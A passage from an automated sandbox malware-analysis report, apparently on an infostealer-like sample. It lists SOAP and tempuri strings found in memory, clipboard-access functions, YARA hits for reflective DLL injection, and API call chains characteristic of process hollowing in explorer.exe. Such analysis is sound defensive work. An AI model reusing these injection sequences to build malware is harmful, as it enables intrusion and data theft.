                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16V
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                  Source: C:\Windows\explorer.exe, Code function: 7_2_0E8C7CE0 GlobalAlloc, GlobalLock, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
                  Source: C:\Windows\explorer.exe, Code function: 7_2_0E8C7AF0 OpenClipboard, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard

                  System Summary

                  Source: 7.3.explorer.exe.ca53600.6.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.e8b0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.8b70000.0.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.ca53600.1.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.0.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 6.2.svchost.exe.251e2e7d000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.6.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.5.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.0.explorer.exe.8b70000.0.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.2.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.e8b0000.3.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.2.explorer.exe.ca53600.1.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.5.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.2.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.0.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.9.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.9.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 7.0.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 6.2.svchost.exe.251e2e7d000.0.unpack, type: UNPACKEDPE, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: detects Reflective DLL injection artifacts, Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\systemsx.exe, Code function: 1_2_00007FF794832048 GetModuleFileNameW, CreateProcessW, CreateFileW, GetFileSize, CloseHandle, VirtualAlloc, CloseHandle, ReadFile, VirtualFree, CloseHandle, CloseHandle, GetThreadContext, VirtualFree, ReadProcessMemory, GetModuleHandleA, GetProcAddress, NtUnmapViewOfSection, VirtualFree, VirtualAllocEx, VirtualFree, WriteProcessMemory, VirtualFree, WriteProcessMemory, VirtualFree, RtlCompareMemory, ReadProcessMemory, WriteProcessMemory, VirtualFree, WriteProcessMemory, SetThreadContext, VirtualFree, ResumeThread, VirtualFree, VirtualFree
                  Source: C:\Windows\explorer.exe, Code function: 7_2_0E8B1370 CreateFileA, GetFileSize, malloc, ReadFile, CloseHandle, CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory, WriteProcessMemory, NtQueryInformationProcess, WriteProcessMemory, SetThreadContext, ResumeThread, CloseHandle, CloseHandle, free
